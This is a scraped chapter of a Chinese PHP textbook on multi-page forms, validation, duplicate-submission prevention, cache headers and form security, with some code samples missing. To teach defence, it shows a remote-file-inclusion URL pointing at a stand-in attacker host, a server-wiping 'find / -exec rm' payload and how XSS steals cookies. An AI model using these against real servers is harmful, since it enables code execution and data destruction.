http://book.csdn.net/bookfiles/541/10054118239.shtml

http://book.csdn.net/bookfiles/541/10054118239.shtml

5.7  多页面间传递数据

当遇到一个非常大的表单时,不可能把所有的表单都放在一个页面里面,需要将一个大表单分解成若干个小表单,并保存于几个页面中,当第一个表单填写完后,需要收集该表单的值并传递给下一个表单页面。

我们可以使用如下方法进行处理。

Ø  使用表单的隐含元素(hidden)。

Ø  把当前表单的数据保存在SESSION中(详情请参见会话一章)。

Ø  把当前表单的数据保存在MySQL数据库中。

你可以从以上三个方案中选择一种易于程序处理和调试的解决方案。表单的传值可以使用POST,这样传递数据的尺寸不成问题,另外,在调试程序时,我们可以通过查看HTML源文件方式,来知道当前的变量是否是预想的值。

对于一个非常大的表单,我们就要想办法把它们分解成两个或更多个表单以方便用户输入,这需要在页面间传值,代码如下:

当多个页面传递数据时,我们可以使用类似上面的语句来处理前一页或通过URL传递的值。

5.8  验证表单数据

前面提过,不能指望用户按我们的意愿输入数据,因此,在用户提交表单后,一定要对用户输入进行校验处理,比如希望用户输入1012,而不是输入10.12这种数据,这就需要我们在客户端(浏览器)和PHP两端都要进行验证。

5.8.1  客户端验证

我们 可以使用JavaScript在客户端来校验表单内容,如果数据正确才允许提交到服务器端,这是Web开发中最常见的方法。利用客户端验证的好处是用户反 馈快,无须直接到服务器请求信息后再下载HTML页。大多数验证是放在表单的"onSubmit"事件中,当JavaScript处理表单验证,用户试图 递交表单,则立即返回布尔值False,浏览器也不会进行表单提交,方便用户立即纠正错误,因为校验动作都在客户端,从而减小了服务器端的负荷。其缺点 是,客户端浏览器如IE、Firefox,它们对所支持的JavaScript脚本解释并不完全相同,在细节上彼此也有些差异。此外,一些用户为了安全, 在浏览器端禁止了对JavaScript的支持,或者根本就是恶意的关闭,这样客户端浏览器就完全不理会客户端验证,为避免这个安全问题,所以仍需要在服 务器端进行再次数据验证。

5.8.2  服务器端验证

使用服务器端数据验证,是利用PHP脚本来处理表单数据。与客户端验证相比,使用服务器验证的优点在于:它更安全,与所有浏览器无缝对接;缺点是代价稍高,用户反馈慢、增加了服务器负荷。

使用服务器端验证另一大的优势是,你可以用PHP对校验规则进行任意的修改,利用PHP的多种函数和灵活特点,可以很方便更改校验的数据类型、长度,以及检查文本框范围内的号码等。

另外,如果用PHP连接MySQL数据库才能验证用户名是否存在,这种情况下,根本不可能使用客户端脚本。

5.8.3  避免表单重复提交

用户提交表单时可能因为网速的原因,或者网页被恶意刷新,致使同一条记录重复插入到数据库中,这是一个比较棘手的问题。我们可以从客户端和服务器端一起着手,设法避免同一表单的重复提交。

1.使用客户端脚本

提到客户端脚本,经常使用的是JavaScript进行常规输入验证。在下面的例子中,我们使用它处理表单的重复提交问题,请看下面的代码:

 

 

当用户单击“提交”按钮后,该按钮将变为灰色不可用状态,如图5-6所示。

图5-6

上面的例子中使用OnClick事件检测用户的提交状态,如果单击了“提交”按钮,该按钮立即置为失效状态,用户不能单击按钮再次提交。

还有一个方法,也是利用JavaScript的功能,但是使用的是OnSubmit()方法,如果已经提交过一次表单,将立即弹出对话框,代码如下:

 

在上例中,如果用户已经单击“提交”按钮,该脚本会自动记录当前的状态,并将submitcount变量自加1,当用户试图再次提交时,脚本判断submitcount变量值非零,提示用户已经提交,从而避免重复提交表单。

2.使用Cookie处理

使用Cookie记录表单提交的状态,根据其状态可以检查是否已经提交表单,请见下面的代码:

if(isset($_POST['go'])){

    setcookie("tempcookie","",time()+30);

    header("Location:".$_SERVER[PHP_SELF]);

    exit();

}

if(isset($_COOKIE["tempcookie"])){

    setcookie("tempcookie","",0);

    echo "您已经提交过表单";

}

?>

如果客户端禁止了Cookie,该方法将不起任何作用,这点请注意。关于Cookie的详细介绍,请参阅第10章“PHP会话管理”。

3.使用Session处理

利用 PHP的Session功能,也能避免重复提交表单。Session保存在服务器端,在PHP运行过程中可以改变Session变量,下次访问这个变量 时,得到的是新赋的值,所以,可以用一个Session变量记录表单提交的值,如果不匹配,则认为是用户在重复提交,请见如下代码:

    session_start();

    //根据当前SESSION生成随机数

    $code = mt_rand(0,1000000);

    $_SESSION['code'] = $code;

?>

在页面表单上将随机数作为隐藏值进行传递,代码如下:

在接收页面的PHP代码如下:

session_start();

if(isset($_POST['originator'])) {

    if($_POST['originator'] == $_SESSION['code']){

        // 处理该表单的语句,省略

    }else{

        echo ‘请不要刷新本页面或重复提交表单!’;

    }

}

?>

关于Session的内容,我们会在第10章“PHP会话管理”详细讨论,你可以直接查阅这一章,然后再返回本节继续阅读。

4.使用header函数转向

除了上面的方法之外,还有一个更简单的方法,那就是当用户提交表单,服务器端处理后立即转向其他的页面,代码如下所示。

if (isset($_POST['action']) && $_POST['action'] == 'submitted') {

    //处理数据,如插入数据后,立即转向到其他页面

    header('location:submits_success.php');

}

这样,即使用户使用刷新键,也不会导致表单的重复提交,因为已经转向新的页面,而这个页面脚本已经不理会任何提交的数据了。

5.8.4  表单过期的处理

在开发过程中,经常会出现表单出错而返回页面的时候填写的信息全部丢失的情况,为了支持页面回跳,可以通过以下两种方法实现。

1.使用header头设置缓存控制头Cache-control。

header('Cache-control: private, must-revalidate');  //支持页面回跳

2.使用session_cache_limiter方法。

session_cache_limiter('private, must-revalidate'); //要写在session_start方法之前

下面的代码片断可以防止用户填写表单的时候,单击“提交”按钮返回时,刚刚在表单上填写的内容不会被清除:

session_cache_limiter('nocache');

session_cache_limiter('private');

session_cache_limiter('public');

session_start();

//以下是表单内容,这样在用户返回该表单时,已经填写的内容不会被清空

将该段代码贴到所要应用的脚本顶部即可。

Cache-Control消息头域说明

Cache-Control指定请求和响应遵循的缓存机制。在请求消息或响应消息中设置Cache-Control并不会修改另一个消息处理过程中的缓存处理过程。

请求 时的缓存指令包括no-cache、no-store、max-age、max-stale、min-fresh和only-if-cached,响应消 息中的指令包括public、private、no-cache、no-store、no-transform、must-revalidate、 proxy-revalidate和max-age。各个消息中的指令含义如表5-3所示。

表5-3

缓存指令

   

public

指示响应可被任何缓存区缓存

private

指示对于单个用户的整个或部分响应消息,不能被共享缓存处理。这允许服务器仅仅描述当用户的部分响应消息,此响应消息对于其他用户的请求无效

no-cache

指示请求或响应消息不能缓存

no-store

用于防止重要的信息被无意的发布。在请求消息中发送将使得请求和响应消息都不使用缓存

max-age

指示客户机可以接收生存期不大于指定时间(以秒为单位)的响应

min-fresh

指示客户机可以接收响应时间小于当前时间加上指定时间的响应

max-stale

指示客户机可以接收超出超时期间的响应消息。如果指定max-stale消息的值,那么客户机可以接收超出超时期指定值之内的响应消息

有关Session和Cookie的介绍,详细内容请参阅第10章“PHP会话管理”。

5.8.5  判断表单动作的技巧

表单可以通过同一个程序来分配应该要处理的动作,在表单中有不同的逻辑,要怎么判别使用者按下的按钮内容不过是个小问题。

其实只要通过提交按钮的name 就可以知道了,表单在提交出去的时候,只有按下的submit类型的按钮才会被送到表单数组去,所以只要判断按钮的值就可以知道使用者按下哪一个按钮,以如下表单为例:

当使用者按下“a”按钮的时候btn=a,按下“b”按钮,则btn=b。

另外也可以通过提交按钮的名字(name)来判断,请见如下代码:

这样只要POST/GET的参数里面有a或b,就可以知道按下的按钮是哪个。

    print_r($_POST);

?>

5.9  表单安全

网站的访客是千差万别的,他可能是一个学生,也可能是一位教授,可能是一个什么都不懂的电脑菜鸟,更有可能是个黑客,不管是弹出意外的错误,还是故意找碴,他们总是喜欢不按我们希望的方式输入,或者寻找我们网站的安全漏洞。

网站中一些常见漏洞,很多原因是开发者的大意造成的,当然还有一部分原因是因为操作系统或服务器配置的原因。常见的安全隐患与比例如表5-4所示。

表5-4

程序缺陷

   

用户输入不做验证

42.6%

访问控制缺陷

3.6%

SESSION ID验证漏洞

5.4%

数据库SQL注入

28.6%

错误报告

7.1%

其他问题

0.9%

这个结果作为我们编写程序时的警钟,它告诉我们,为了保证系统的安全,一定注意这几个漏洞,不要为了贪图一时之便,或者为了执行的效率而牺牲了系统安全性,万一失掉了宝贵的数据,或者网站被别人用来发放不良信息而影响了信誉,就得不偿失了。

在本节中,我们介绍导致站点被连续攻击的漏洞,然后,介绍针对这些问题介绍技术解决方法。

5.9.1  处理全局性错误

可以确定,一些经常发生的错误是完全可以避免的,另外经常浏览安全网站,或订阅相关的邮件列表,可以注意到每周的安全焦点和预防措施,以及专门针对于PHP应用程序的攻防策略。

1.全局变量

一个 最基本错误是没有适当地初始化全局变量。注意设置php.ini的开关参数。虽然PHP 5的register_globals参数值默认为Off,但为了防止这种错误的发生,我们仍要注意这个问题,如果程序中不能生成变量,那么这个程序很可 能是在register_globals为On的状态下的开发的。

下面的代码就是在register_blobals=On的状态下开发的:

    session_start();

    /*

    * $admin是一个session变量设置验证后的初始值

    */

    if (!$admin) {

        do_exit();

    } else {

        do_admin();

    }

?>

尽管这段代码看上去非常简单,并且也没有明显的语法错误,好像没有太多安全问题,但是只要存在一个缺陷,就可能导致一个攻击者使用这个程序行使“管理员”的权限。最多也最容易发生的问题是程序员使用动态的文件包括语句来处理页面流程,如以下代码所示。

    include_once $module. '.php';

?>

这个脚本可以被攻击者利用,在服务器上执行任意PHP代码。

如果 在浏览器上的URL GET参数,简单地加入?module=http://hackerweb.com/evilscript,会是什么效果?如果PHP接收到这个URL, 会把$module变量等于http://hackerweb.com/evilscript.php。当运行到include()函数时,PHP会尝试 在example.com包含这个evilscript.php,以及执行这个程序的代码,而evilscript可能包含如下的代码:

    'find / -exec rm "{}" ";"';

?>

这串代码可以访问我们的服务器,并且把服务器上所有的文件全部删除!

还有一些潜在的危险,那就是register_globals的一些特性,我们一步一步地处理:

首先,我们要在php.ini中将register_globals设置为Off;

第二步,将程序里的$admin,全部换成$_SESSION['admin'];

第三步,我们要解决的是,在程序进行包含操作之前,检查在本地机器中该文件是否存在,如果不存在,则不进行包含操作,比如进行如下的改进:

    if (file_exists($module. '.php')) {

        include $module. '.php';

    }

?>

2.客户端恶意脚本   

常见Web站点不安全的编程漏洞包括:密码漏洞、跨站脚本漏洞、不安全的存储漏洞和拒绝服务漏洞。

下面我们一起讨论跨站式XSS脚本攻击技术。

跨站式XSS漏洞主要是因为HTML没有明确区分代码和数据;其次,程序在将用户数据发送回浏览器时没有进行有效的转义,这导致包含有引号的数据被放入页面中。

一个攻击者可能利用一个客户端脚本来执行一些片断,例如JavaScript或VBScript,来窃取Cookies或其他敏感数据,这些攻击只需要通过插入一行HTML数据到我们的网站就能实施。

例如,这个攻击者可能将一些代码输入到我们网站的文本框,如果我们的程序没有过滤HTML标志,该代码将会被插入到网站数据库中,比如,图5-7所示的用户界面。

图5-7

这是一个显示用户注册的页面,攻击者可能会在文本框中连续输入如下代码:

如果没经过滤就将数据插入到数据库中,在点击查看用户信息时,将会出现图5-8所示的效果。

图5-8

未经验证输入的后果是,攻击者利用XSS 脚本攻击我们的网站,并有可能取得管理员登录的Cookie信息。

另外,在网站的前台页面,如果攻击者在上面的JavaScript中加入一个无限循环,可能就比较麻烦了,浏览者可能需要结束浏览器进程才能避免对话框的再次出现,那么该访问者可能再也不会进入我们的网站。

3.预防XSS攻击的方法

预防XSS攻击最简单的方法就是过滤从表单来的数据,可以使用PHP函数以及数据库的过滤函数。我们使用如下函数或语句。

Ø  使用htmlspecialchars()解码“'”,“"”,“<”,“>”和“&”这些HTML编码,前面我们说过使用  htmlentities()转换任意的HTML超文本实体,主要就是过滤输出(过滤

你可能感兴趣的:(http://book.csdn.net/bookfiles/541/10054118239.shtml)